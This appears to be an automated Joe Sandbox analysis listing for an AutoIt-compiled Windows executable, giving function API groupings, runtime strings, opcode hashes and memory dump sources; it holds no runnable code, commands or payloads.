                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 1561581874-1000479233
                                                            Similarity
                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                            • String ID: %s%u
                                                            • API String ID: 1412819556-679674701
                                                            Similarity
                                                            • API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
                                                            • String ID: ThumbnailClass
                                                            • API String ID: 4010642439-1241985126
                                                            Similarity
                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                            • String ID: P
                                                            • API String ID: 1268354404-3110715001
                                                            Similarity
                                                            • API ID: LoadStringwprintf
                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 3297454147-2391861430
                                                            Similarity
                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                            • API String ID: 3030280669-22481851
                                                            Similarity
                                                            • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                            • String ID: static
                                                            • API String ID: 3821898125-2160076837
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 3827137101-3457252023
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            APIs
                                                              • Part of subcall function 00007FF75F146838: CreateFileW.KERNELBASE ref: 00007FF75F1468A2
                                                              • Part of subcall function 00007FF75F164380: GetCurrentDirectoryW.KERNEL32(?,00007FF75F14E817), ref: 00007FF75F16439C
                                                              • Part of subcall function 00007FF75F1456D4: GetFullPathNameW.KERNEL32(?,00007FF75F1456C1,?,00007FF75F147A0C,?,?,?,00007FF75F14109E), ref: 00007FF75F1456FF
                                                            • SetCurrentDirectoryW.KERNEL32 ref: 00007FF75F14E8B0
                                                            • SetCurrentDirectoryW.KERNEL32 ref: 00007FF75F14E9FA
                                                            Similarity
                                                            • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            • API String ID: 2207129308-1018226102
                                                            Similarity
                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 636576611-1287834457
                                                            • Opcode ID: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                            • Instruction ID: 4afcbc7f506aedeae110c488886495d91a8a491cf4916827aaf45b44315a606d
                                                            • Opcode Fuzzy Hash: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                            • Instruction Fuzzy Hash: 99714B22A08B8685EF54AF26E4501FDA7B0FB84B98F985432DE0E87765DF3DE445C360
                                                            Similarity
                                                            • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
                                                            • String ID: 5$Ping
                                                            • API String ID: 1486594354-1972892582
                                                            • Opcode ID: e10d707c2ccc8c8e229b93576497dc969839fee377a1bbf9481b12c7ce409e4d
                                                            • Instruction ID: 3505af2aee2e6ef08a9b23548eafe903295ac886f9040cfbe3197ac6f02b4bd9
                                                            • Opcode Fuzzy Hash: e10d707c2ccc8c8e229b93576497dc969839fee377a1bbf9481b12c7ce409e4d
                                                            • Instruction Fuzzy Hash: F8718D62A086C282EF60FB15E4943BDA7A0FF84B90F998532DA5E87791DF7CD5418720
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                            • API String ID: 3215553584-2617248754
                                                            • Opcode ID: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                            • Instruction ID: a798f232f18c6f9bff848bdf1925bf676fa9cab6be22252c357828deb3822a61
                                                            • Opcode Fuzzy Hash: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                            • Instruction Fuzzy Hash: 0041AC32A06B8589FB10DB25F8517E973A4FB08398F884135EE5C07B99DF38D425C364
                                                            Similarity
                                                            • API ID: HandleLoadMessageModuleStringwprintf
                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                            • API String ID: 4007322891-4153970271
                                                            • Opcode ID: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                            • Instruction ID: bcc13dabb98f30165b355baf5f8d2bd5c29218e70a57083bcde9f3f5d7098efc
                                                            • Opcode Fuzzy Hash: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                            • Instruction Fuzzy Hash: 91314A72A18AC292EF10FB21F8459EDA360FB94B84FC84432EA4D43699DF3CD506C760
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 2573188126-1403004172
                                                            • Opcode ID: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                            • Instruction ID: 2cad5b2bd06e9ada478ac2fd784559ce6bcf6f3493eb9e54fb7f16b896b0ecc9
                                                            • Opcode Fuzzy Hash: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                            • Instruction Fuzzy Hash: 88319075A09AC182EF10BB11F8541E9A761FF89BE0F884231DBAD077D6DF2CD5068760
                                                            Similarity
                                                            • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 2479661705-3771769585
                                                            • Opcode ID: 281b95de85becf4cb0c172ae07bcd082ee5a72526fdd79f54f4593c1c2c2b1be
                                                            • Instruction ID: 7592ba0ac86835763d72d2a4fc5cd948747048ab0c057cd065bbec4390359c72
                                                            • Opcode Fuzzy Hash: 281b95de85becf4cb0c172ae07bcd082ee5a72526fdd79f54f4593c1c2c2b1be
                                                            • Instruction Fuzzy Hash: 34215E21A089C281EE24BB11F9443FDE360EF94BD0FC84136D64E46AA5DF2CD949C324
                                                            Similarity
                                                            • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                            • String ID:
                                                            • API String ID: 2672075419-0
                                                            • Opcode ID: 7f60c88404643dc1ac8f4702e655552145117f454e5503c1890abb71af915063
                                                            • Instruction ID: 2fd4b97a68b5f6fec6a8cd782ec83ec12c91d7e86e0545a5cd997412b7e19b5e
                                                            • Opcode Fuzzy Hash: 7f60c88404643dc1ac8f4702e655552145117f454e5503c1890abb71af915063
                                                            • Instruction Fuzzy Hash: 68919F76B086928AEF50EF71E4843FDA3A1EB44B88F984035DE0D53689CF39E4468730
                                                            Similarity
                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                            • String ID:
                                                            • API String ID: 2156557900-0
                                                            • Opcode ID: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                            • Instruction ID: 6cced89132ef69b55086fb8dc626b532f14890068cb120f36480c6db1de5aff7
                                                            • Opcode Fuzzy Hash: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                            • Instruction Fuzzy Hash: B9315775B0868287EB50AB29B984679F2A2AB58750FD84134CD0F87794DF3DEC468720
                                                            Similarity
                                                            • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                            • String ID:
                                                            • API String ID: 685491774-0
                                                            • Opcode ID: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                            • Instruction ID: 8afb2e3adf49b76c4e2bf1519b3d3ec7b8fd4c1a0051487eb65fba46a0ac3018
                                                            • Opcode Fuzzy Hash: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                            • Instruction Fuzzy Hash: 8211A235B0568282FB04BB76B8985ED6661AFCCB80F895038CA4E8BB50DF3DD0568370
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 0-1603158881
                                                            • Opcode ID: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                            • Instruction ID: 9ed74efed3221f0e109a2a59a1334366470cafb74f0b46c3d19b9814e8018ec6
                                                            • Opcode Fuzzy Hash: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                            • Instruction Fuzzy Hash: E312D562B1A6C352FE68BB31E8156F9E290BF54784FCC4131DA5E86294EF3CE554C2B0
                                                            Similarity
                                                            • API ID: Variant$Init$Clear
                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                            • API String ID: 3467423407-1765764032
                                                            • Opcode ID: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
                                                            • Instruction ID: 5d574ef8050665f94c61330270e04986c92f3f9e79611c95026f776be6efde9b
                                                            • Opcode Fuzzy Hash: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
                                                            • Instruction Fuzzy Hash: 4BA18D32A08B8286EF60AF66E4505EDA7B0FB88B98F880536DE4D47754DF3CD545C790
                                                            Similarity
                                                            • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                            • String ID:
                                                            • API String ID: 1903627254-0
                                                            • Opcode ID: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                            • Instruction ID: 1c75382ade9d2e83d4f43c2863ea5e4a5b95da5428fbf0fb2dec4b9b5fc40982
                                                            • Opcode Fuzzy Hash: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                            • Instruction Fuzzy Hash: D3023E62A08A8686DF90EF29E4841EDA770FB84B88F944532EF4E47764DF3CD549CB50
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            • Opcode ID: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                            • Instruction ID: b0b6f08a3e7970f45d5376adc620c61b76dd2808e1b86c45508a0a53a60bf6ef
                                                            • Opcode Fuzzy Hash: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                            • Instruction Fuzzy Hash: 1F210C76519B8182EB10DF52F4883A9BBA0F789FEAF484129DB9D07B54CF7CD1498710
                                                            Similarity
                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                            • API String ID: 3721556410-2107944366
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                            • String ID: 2$P
                                                            • API String ID: 93392585-1110268094
                                                            Similarity
                                                            • API ID: IconLoad_invalid_parameter_noinfo
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 4060274358-404129466
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
                                                            • String ID:
                                                            • API String ID: 50796853-0
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID:
                                                            • API String ID: 3864802216-0
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            Similarity
                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                            • String ID:
                                                            • API String ID: 2550207440-0
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            Similarity
                                                            • API ID: MessageSendWindow$Enabled
                                                            • String ID:
                                                            • API String ID: 3694350264-0
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            Similarity
                                                            • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                            • String ID:
                                                            • API String ID: 3401586794-0
                                                            Similarity
                                                            • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                            • String ID: DllGetClassObject
                                                            • API String ID: 668425406-1075368562
                                                            Similarity
                                                            • API ID: LongMessageSendWindow
                                                            • String ID:
                                                            • API String ID: 3360111000-0
                                                            Similarity
                                                            • API ID: ErrorLastinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 4170576061-0
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                            • String ID:
                                                            • API String ID: 161812096-0
                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 395352322-0
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • API ID: AllocByteCharMultiStringWide
                                                            • String ID:
                                                            • API String ID: 3603722519-0
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 1025951953-3636473452
                                                            • API ID: CreateHandlePipe
                                                            • String ID: nul
                                                            • API String ID: 1424370930-2873401336
                                                            • API ID: CreateHandlePipe
                                                            • String ID: nul
                                                            • API String ID: 1424370930-2873401336
                                                            • API ID: Rect$Client$Window$MetricsScreenSystem
                                                            • String ID:
                                                            • API String ID: 3220332590-0
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: f$p
                                                            • API String ID: 3215553584-1290815066
                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                            • String ID:
                                                            • API String ID: 3859894641-0
                                                            • API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
                                                            • String ID:
                                                            • API String ID: 564229958-0
                                                            • API ID:
                                                            • String ID: %.15g$0x%p$False$True
                                                            • API String ID: 0-2263619337
                                                            • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                            • String ID:
                                                            • API String ID: 2592858361-0
                                                            • Opcode ID: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                            • Instruction ID: b5153506bbfd73b66f6b00cf51054f316d1128c2bd8444df479e318543f8f2fb
                                                            • Opcode Fuzzy Hash: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                            • Instruction Fuzzy Hash: DD51AF72B086C286EF20EB11E4483F9B764FB89B94F984235CA5D47B94DF7CE4068721
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
                                                            • String ID:
                                                            • API String ID: 383626216-0
                                                            • Opcode ID: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                            • Instruction ID: 0a6d11ae99a72133922f82293cb7f2c3ce1d05881d248813d4ce86d4865abfc3
                                                            • Opcode Fuzzy Hash: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                            • Instruction Fuzzy Hash: C431A033B046928BE754DF61E4807EC77A1FB88748F980235EF0A57A84DF38E9468750
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2082702847-0
                                                            • Opcode ID: 61ceddc5787947a58d9fe000786d9d3995f6ca174d30162394f7b26a0e686deb
                                                            • Instruction ID: 2aeca8456edafd02e84071e89d47e7ae161415aca09a3bddce440d4071de7e70
                                                            • Opcode Fuzzy Hash: 61ceddc5787947a58d9fe000786d9d3995f6ca174d30162394f7b26a0e686deb
                                                            • Instruction Fuzzy Hash: 49216221A0E7C282EE19AB61B4441F9E290AF44774F9C0734DA3E167D5DF3CD8098620
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                            • String ID:
                                                            • API String ID: 43455801-0
                                                            • Opcode ID: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                            • Instruction ID: 5a5b0f726a16d97793980f5d8267ce224212e9cea61220e6f39d7f904e7cb017
                                                            • Opcode Fuzzy Hash: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                            • Instruction Fuzzy Hash: 9E119131F186D282EB14AB15B8587A9BB60EF85B94F9C5130CF0603B54CF7DE446C760
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                            • Instruction ID: a7146cbe318f5267aabb8e83954cf1c7f1804ae08bc608daa8fcba9d24434455
                                                            • Opcode Fuzzy Hash: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                            • Instruction Fuzzy Hash: B61112729066808AD748DF39DC881997FB2FB58B09B989034C3498F265EF39D49BC721
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 839392675-0
                                                            • Opcode ID: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                            • Instruction ID: 15e38841c135c5fe92a5b891c0dc485b3d9c907e96ffcd4b7ca09428c1a4cbda
                                                            • Opcode Fuzzy Hash: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                            • Instruction Fuzzy Hash: 45018F32A1978183EF10AB22F844AA9B761FF89B95F895134CA0A06B14DF3CD0498B20
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                            • String ID:
                                                            • API String ID: 179993514-0
                                                            • Opcode ID: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                            • Instruction ID: 5ce3ea33dfe3e1e6197320ff5190138a8da76671b0544b335ff72d5d07b9d4ad
                                                            • Opcode Fuzzy Hash: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                            • Instruction Fuzzy Hash: 5AF0A421F18B9183FF506B71B8886A9A695BF88744FCC4034DA4E02B54DF3CD0468620
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 1653399731-2785691316
                                                            • Opcode ID: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                            • Instruction ID: 391ec28516a5f41382677ac49e4ea0ded54aa0bcc517210cae75d054f5035801
                                                            • Opcode Fuzzy Hash: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                            • Instruction Fuzzy Hash: 7CB19232A047818AEB50EF61E8401EEB7B5FB84798F980136EE4D97B58DF38D545C790
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF75F1DBF47), ref: 00007FF75F1DCE29
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower
                                                            • String ID: cdecl$none$stdcall$winapi
                                                            • API String ID: 2358735015-567219261
                                                            • Opcode ID: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                            • Instruction ID: 9115cc4bc3972a8e520e26b17c86d8cf83b1f9adb706e78445611a211fbd78a5
                                                            • Opcode Fuzzy Hash: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                            • Instruction Fuzzy Hash: CC91E762F1869281EEA4BF25A4405F9A7B0BF54790BD84532DE1DD3784DF3EE842C360
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4237274167-1221869570
                                                            • Opcode ID: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                            • Instruction ID: 3e3c726370724c62e07ea410de0a7efba561a84394b098e153c5b7187eb678d3
                                                            • Opcode Fuzzy Hash: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                            • Instruction Fuzzy Hash: 3A917B26B09B9285EF50EF65E4802EDB3B4FB88B98B894432DE4E57755DF38E405C360
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 00007FF75F1B0EDB
                                                              • Part of subcall function 00007FF75F1B0B90: CharUpperBuffW.USER32(?,?,00000001,00007FF75F1B0F61), ref: 00007FF75F1B0C6A
                                                            Strings
                                                            Memory Dump Source
